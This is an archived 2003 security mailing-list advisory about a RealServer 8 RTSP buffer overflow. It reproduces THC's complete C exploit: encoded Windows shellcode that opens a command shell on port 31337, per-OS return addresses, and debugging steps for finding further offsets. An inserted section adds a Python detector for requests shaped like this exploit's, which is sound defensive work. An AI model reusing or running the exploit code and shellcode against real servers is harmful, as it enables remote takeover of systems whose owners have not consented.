[EXPL] RealServer 8 Remote Buffer Overflow Vulnerability (Exploit, SETUP, RTSP)

From: support@securiteam.com
Date: 02/15/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 15 Feb 2003 22:10:19 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      RealServer 8 Remote Buffer Overflow Vulnerability (Exploit, SETUP, RTSP)
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in Real Networks' RealServer allows a remote attacker to
    crash it and execute arbitrary code on it (for additional information see
    our previous article:
    <http://www.securiteam.com/securitynews/5IP0A1F96G.html> RealSystem Server
    and Proxy Buffer Overflow Vulnerability). The following exploit code can
    be used to test your system for the mentioned vulnerability.

    DETAILS

    Vulnerable systems:
     * RealServer version 8.0.0.149
     * RealServer version 8.0.2

    /*****************************************************************************/
    /* THCunREAL 0.1 - Wind0wZ remote root exploit */
    /* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
    /* THC PUBLIC SOURCE MATERIALS */
    /* */
    /* This exploit can be freely distributed ! If u r smart enough you can add */
    /* further offsets for other OS Versions/Types/Servicespacks blabla.... */
    /* */
    /* The exploit was tested on 4 different boxes with RealServer 8.0.0.149 */
    /* The bug is exploitable on Realservers < 8.0.2 */
    /* */
    /* While probing lots of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554 */
    /* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
    /* */
    /* The shellcode used in diz exploit is completely offsetless and XOR 0x20 */
    /* encoded, coz Realserver doesn't allow the following bytes in the SETUP */
    /* field : 0x00,0x0d,0x0a,0x25,0x20,0xff ! That's also the reason why i use */
    /* mov dl,0x1f + add dl,0x01 for xor 0x20 encoding. hehehe... */
    /* */
    /* The shellcode itself scans for the KERNEL32.DLL by using FS:0 + searching */
    /* for 'MZ' entry, followed by analysing the PE-Header for API offsets */
    /* needed by this shellcode. After that we can load WS2_32.DLL for socket */
    /* APIs and begin the usual shellcode process ! Thanx to several virus */
    /* coders and Halvar Flake for that rocking idea ! I was wondering why so */
    /* few people are using it today in their exploits ! Just because LSD */
    /* has made this technique public on HiverCon 2002 ! Actually this one isn't */
    /* optimized, but later shellcodes will have a size < 300 bytes. */
    /* */
    /* After successful exploitation of this bug, a commandshell should spawn on */
    /* TCP port 31337 ! Use netcat to connect to this port ! */
    /* */
    /* To find further offsets use softice on windows or gdb on linux boxes ! */
    /* If you're debugging with softice do the following to find offsets : */
    /* Start the Realserver 8 ! ;) */
    /* Enter softice and do the following commands : */
    /* addr rmserver + bpx 405cfc */
    /* Start the exploit and softice will break on the following lines of code : */
    /* */
    /*   mov ecx,[eax] */
    /*   lea edx,[ebp+FFFFF000] */
    /*   push 00 */
    /*   push edx */
    /*   push 80004005 */
    /*   push 80004005 */
    /*   push 03 */
    /*   call [ecx+0c] */
    /* */
    /* As we can overwrite EAX, we have to create 3 values */
    /* (2 retlocs and 1 retaddr), to get control of a vuln system ! */
    /* The good news is, that just the EAX value can differ on different OSs/SPs */
    /* The rest can be calculated ! */
    /*   retloc2 = retloc1-8; */
    /*   retaddr = retloc1+8; */
    /* */
    /* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8 */
    /* runs on. I just know it's also exploitable on other OSs ! */
    /* So if u wanna exploit other platforms, try to get Realserver 8 and use */
    /* gdb to find out, how this can be exploited ! Good luck ! */
    /* */
    /* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
    /* */
    /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
    /* scut, stealth, zip, zilvio and the rest of the combo ...... */
    /*****************************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>

    struct TARGETS {
       char *winver;
       unsigned long retloc1;
    };

    struct TARGETS targets [] = {
    {"Windows 2000 - SP2", 0x0434ecad},
    {"Windows 2000 - SP3", 0x0433ecad},
    {"Windows XP SP1", 0x03fdecad},
    {"Windows NT4 SP6a", 0x0477ecb1},
    {NULL,0},
    };

    char w32portshell[] =
    "\x8b\x7d\x08\x33\xc9\x33\x02\xb2\x1f\x80\xc2\x01\x66\x81\xc1"
    "\x9d\x02\x83\xc7\x25\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xcb"
    "\x49\xa5\xb6\xdf\xdf\xec\x67\xba\x5c\x3b\xea\x07\x1d\x96\x45"
    "\x45\xe3\x4c\x2c\x01\x16\xc2\xb7\x86\x51\x16\x34\x68\x34\xef"
    "\x1c\x61\x48\x37\xee\xed\xe9\xb8\xf2\xc0\x01\x99\xda\x7d\x6c"
    "\xf8\x25\xda\x27\xbb\x5e\x90\x49\xa0\xdf\xdf\xdf\xdf\x4b\xf8"
    "\xc3\x43\x49\x4e\x44\x42\x45\xf1\xf7\x43\x54\xf1\xf7\x53\x45"
    "\x4e\x44\x53\x45\x43\x56\x52\xdf\xdf\xdf\xdf\x77\x73\x12\x7f"
    "\x13\x12\x0e\x64\x6c\x6c\xdf\x7c\x43\x4d\x44\x0e\x45\x58\x45"
    "\xdf\xcb\x22\xcb\x25\xc8\xd9\xdf\xdf\xdf\x7d\xa3\xcd\x54\x11"
    "\xe0\xcb\x7b\x75\xa9\xc5\x40\xab\x65\x28\xab\x78\x1c\x21\xe3"
    "\xab\x6b\x58\x21\xe1\xab\x59\x3c\x21\xe7\x77\xab\x59\x04\x21"
    "\xe7\x77\xdf\x51\x30\x61\xab\x51\x3f\x69\x21\xe6\x11\xe9\xa9"
    "\xe7\x11\xfb\x61\x8d\x21\xd8\x76\xa9\xe6\x11\xe0\x8c\x21\xe3"
    "\xe1\xeb\x28\xa4\xe0\x55\xd4\x1b\x7d\x2c\x7e\x55\xc5\x78\x7a"
    "\x09\xe1\x2f\x97\x2c\x6a\x7e\xab\x24\xae\x21\xd8\xa9\x64\x04"
    "\x3c\x41\x7d\xe3\x94\x30\x09\xe4\x11\xe9\x44\xab\x31\xa9\xf7"
    "\xab\x2f\xa1\xd9\xdf\xdf\xdf\xdf\x54\x24\xa9\xef\xcb\xd2\xab"
    "\x5f\x24\x46\x11\xdf\x11\xe9\x95\x30\x46\xab\x37\x46\xa1\xda"
    "\x6d\x7a\x54\x24\x09\xef\xcb\xd2\xa9\x5d\xdc\xad\x7d\x5c\xad"
    "\x55\x27\x8d\x70\x60\x54\x2e\xb0\x77\xdf\xf3\xa9\x66\xdc\xa9"
    "\xe1\xc9\xcd\xdf\xdf\xdf\x10\xe0\xa6\x65\x41\xa4\xe0\x54\x2d"
    "\xad\x75\x77\x72\xdf\xf1\xa9\xe7\xc9\xf7\xdf\xdf\xdf\xad\x9d"
    "\x48\xdf\xdf\xdf\x77\xdf\x75\x0f\xad\x55\x42\x21\xe7\x85\x85"
    "\x10\xe0\xa8\x27\x11\xfb\x73\x4a\x21\x4a\x22\xdf\x75\x1b\xa9"
    "\x65\xc4\xa9\x7d\xd0\xa9\x7d\xd4\xa9\x7d\xcc\x93\x22\xa9\x7d"
    "\xc8\x2f\x97\x7d\x22\x2f\x97\x65\x24\x11\xf8\x46\xa9\x65\xca"
    "\x4a\x30\xad\x7d\xc8\x73\xdf\x55\xc4\xdf\x75\x1f\x4a\x21\xdf"
    "\x55\xc4\xdf\x75\x67\x11\xe0\xa9\x65\xfc\x60\xa9\x65\xc0\x90"
    "\x2c\xa9\x65\xf8\x11\xe0\x70\xad\x7d\xf8\x73\xa9\xf9\xa3\xcb"
    "\x24\x73\xa3\xcb\x24\x73\x70\x71\xa3\xcb\x24\x73\xa3\xcb\x24"
    "\x73\xab\x7d\x2b\xdf\xf3\xdf\xf3\xad\x65\xa4\x70\xdf\x75\x37"
    "\xab\x65\xf4\xa9\x65\xe4\xa9\x65\xe0\xab\x65\xe8\xa9\x65\x9c"
    "\x11\xe0\x46\xa9\x65\x94\xde\xe0\xde\xe4\xa9\x65\x90\xde\xe8"
    "\xa6\x65\x4a\xad\xbd\x48\xdf\xdf\xdf\xad\xb5\x54\xdf\xdf\xdf"
    "\xad\x6d\xa4\x11\xe0\x72\x71\x70\x70\x70\x4a\x21\x70\x70\x70"
    "\x73\xdf\x75\x27\x11\xe0\x70\x70\xdf\x55\xc4\xdf\x75\x63\xa9"
    "\x65\xc4\xad\x9d\x4c\xcf\xdf\xdf\x4a\x5e\xdf\x75\x2f\x11\xfb"
    "\x73\xad\xad\x50\xdf\xdf\xdf\x71\x73\x73\x73\xdf\x55\xf0\xdf"
    "\x75\x3f\x19\xbd\x50\xdf\xdf\xdf\x54\x17\x73\xad\xb5\x4c\xdf"
    "\xdf\xdf\x72\xab\xb5\x50\xdf\xdf\xdf\x94\xde\x10\xe0\x46\xa5"
    "\xe2\x54\x24\x96\x22\x10\xf2\x72\x77\xdf\x55\xf0\xdf\x75\x03"
    "\xa5\xe0\x54\x18\x73\xdf\x95\x4c\xdf\xdf\xdf\x77\xdf\x55\xc4"
    "\xdf\x75\x6b\xcb\x83\x73\x11\xe0\x94\x22\x70\x77\xdf\x55\xc4"
    "\xdf\x75\x6f\x60\x54\x38\x68\x54\x35\x73\xad\xb5\x50\xdf\xdf"
    "\xdf\x72\x70\x77\xdf\x55\xec\xdf\x75\x07\xc9\x5b\xdf\xdf\xdf"
    "\x48\xdf\xdf\xdf\xdf\xdf\x75\x2f";

    void usage();

    int main(int argc, char *argv[])
    {
      unsigned short realport=554;
      unsigned int sock,addr,i,rc;
      unsigned char exploit_buffer[4124];
      unsigned long retloc2, retaddr;
      struct sockaddr_in mytcp;
      struct hostent * hp;
      WSADATA wsaData;

      printf("\nTHCunREAL v0.1 - Wind0wZ remote root sploit for Realserver < 8.0.2\n");
      printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");

      if(argc<3)
       usage();

      if((atoi(argv[2]))>3)
       usage();
      
     retloc2 = targets[atoi(argv[2])].retloc1-8;
     retaddr = targets[atoi(argv[2])].retloc1+8;

     memset(exploit_buffer,'Z',4123);
     memcpy(exploit_buffer,"SETUP /",7);
     *(unsigned long *)&exploit_buffer[7] = retloc2;
     *(unsigned long *)&exploit_buffer[7 + 4] = retaddr;
     memcpy(&exploit_buffer[15],w32portshell,strlen(w32portshell));
     *(unsigned long *)&exploit_buffer[4086] = targets[atoi(argv[2])].retloc1;
     /* request line terminator plus headers: 33 bytes */
     memcpy(&exploit_buffer[4090]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
     
      if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
      {
       printf("WSAStartup failed !\n");
       exit(-1);
      }
      
      hp = gethostbyname(argv[1]);

      if (!hp){
       addr = inet_addr(argv[1]);
      }
      if ((!hp) && (addr == INADDR_NONE) )
      {
       printf("Unable to resolve %s\n",argv[1]);
       exit(-1);
      }

      sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      if (!sock)
      {
       printf("socket() error...\n");
       exit(-1);
      }
      
      if (hp != NULL)
       memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
      else
       mytcp.sin_addr.s_addr = addr;

      if (hp)
       mytcp.sin_family = hp->h_addrtype;
      else
       mytcp.sin_family = AF_INET;

      mytcp.sin_port=htons(realport);
     
      rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
      if(rc==0)
      {
        send(sock,exploit_buffer,4123,0);
        printf("\nexploit send .... sleeping a while ....\n");
        Sleep(1000);
        printf("\nok ... now try to connect to port 31337 via netcat !\n");
      }
      else
       printf("can't connect to realserver port!\n");
      
      shutdown(sock,1);
      closesocket(sock);
      exit(0);
    }

     
    void usage()
    {
     unsigned int a;
     printf("\nUsage: <Host> <target-type>\n");
     printf("\nTargets available :\n\n");
     for (a=0; targets[a].winver != NULL; a++)
      printf ("%d) - %s\n", a, targets[a].winver);
     exit(0);
    }
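    As an added, defender-side example (not part of this advisory and not THC's
    code): a small Python checker that flags RTSP requests shaped like the one
    the exploit above sends. The comment header notes that the SETUP field
    rejects 0x00, 0x0d, 0x0a, 0x25, 0x20 and 0xff, so the whole payload has to
    sit inside the request-line URL; that makes an oversized URL, a long
    single-byte filler run, and non-printable bytes in the URL usable as
    generic indicators, and the literal "Transport: THCr0x!" header as a
    signature for this specific tool. The two sample requests are constructed
    for the example, not captured traffic, and contain no shellcode; the
    thresholds MAX_URL_LEN and PADDING_RUN are assumptions to tune per
    deployment.

```python
import re

# Constructed sample requests (not captured traffic). The first is an ordinary
# RTSP SETUP; the second mimics the shape the advisory describes: a SETUP whose
# URL field is thousands of bytes of filler plus non-printable bytes, followed
# by the "Transport: THCr0x!" header the published exploit sends.
BENIGN_SETUP = (
    b"SETUP rtsp://media.example.invalid/clip.rm/streamid=0 RTSP/1.0\r\n"
    b"CSeq: 2\r\n"
    b"Transport: RTP/AVP;unicast;client_port=4588-4589\r\n\r\n"
)
SUSPICIOUS_SETUP = (
    b"SETUP /" + b"\x90\xe8\x07" + b"Z" * 4000 + b" RTSP/1.0\r\n"
    b"Transport: THCr0x!\r\n\r\n"
)

# Thresholds are assumptions for this example; tune them to the longest
# legitimate URL your server actually serves.
MAX_URL_LEN = 512
PADDING_RUN = 256

RTSP_METHODS = {b"OPTIONS", b"DESCRIBE", b"ANNOUNCE", b"SETUP", b"PLAY",
                b"PAUSE", b"TEARDOWN", b"GET_PARAMETER", b"SET_PARAMETER",
                b"REDIRECT", b"RECORD"}


def parse_request_line(raw: bytes):
    """Split the first CRLF-terminated line into (method, url, version).

    Returns None when there is no CRLF or fewer than three fields.
    """
    line, sep, _ = raw.partition(b"\r\n")
    if not sep:
        return None
    parts = line.split(b" ")
    if len(parts) < 3:
        return None
    # Everything between the method and the version is treated as the URL,
    # so a URL field containing stray spaces is still examined as a whole.
    return parts[0], b" ".join(parts[1:-1]), parts[-1]


def analyse_rtsp_request(raw: bytes) -> list:
    """Return a list of findings for one RTSP request; [] means nothing odd."""
    findings = []
    parsed = parse_request_line(raw)
    if parsed is None:
        return ["malformed request line"]
    method, url, version = parsed
    if method not in RTSP_METHODS:
        findings.append("unknown method")
    if not version.startswith(b"RTSP/"):
        findings.append("unexpected protocol version")
    if len(url) > MAX_URL_LEN:
        findings.append("oversized URL (%d bytes)" % len(url))
    if any(b < 0x20 or b > 0x7E for b in url):
        findings.append("non-printable bytes in URL")
    # A long run of one repeated byte is characteristic of overflow padding,
    # not of any URL a media client would request.
    if re.search(rb"(.)\1{%d,}" % (PADDING_RUN - 1), url, re.DOTALL):
        findings.append("long single-byte padding run in URL")
    headers = raw.partition(b"\r\n")[2]
    if re.search(rb"^Transport:[ \t]*THCr0x!", headers, re.MULTILINE):
        findings.append("known exploit marker in Transport header")
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(name, analyse_rtsp_request(sample) or "clean")
```

    The generic checks (URL length, filler run, byte range) are the ones worth
    keeping: they also catch variants that change the marker header or the
    padding byte, whereas the "THCr0x!" match only identifies this particular
    tool. In practice the function is fed one reassembled request at a time
    from an RTSP-aware proxy or IDS in front of the server.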

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:jcyberpunk@thehackerschoice.com> Johnny Cyberpunk.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.